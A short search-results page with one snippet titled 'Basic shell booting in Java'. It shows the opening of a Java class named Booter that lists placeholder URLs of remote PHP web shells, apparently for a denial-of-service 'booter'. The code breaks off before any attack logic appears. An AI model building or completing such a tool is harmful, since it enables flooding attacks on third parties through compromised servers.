Search results

  1. Basic shell booting in Java.

    import java.io.IOException; import java.net.URL; import java.util.ArrayList; public class Booter { static ArrayList<String> shells = new ArrayList(); public static void main(String[] args) { shells.add("example.com/derp.php"); shells.add("example2.com/derp.php")...
Back
Top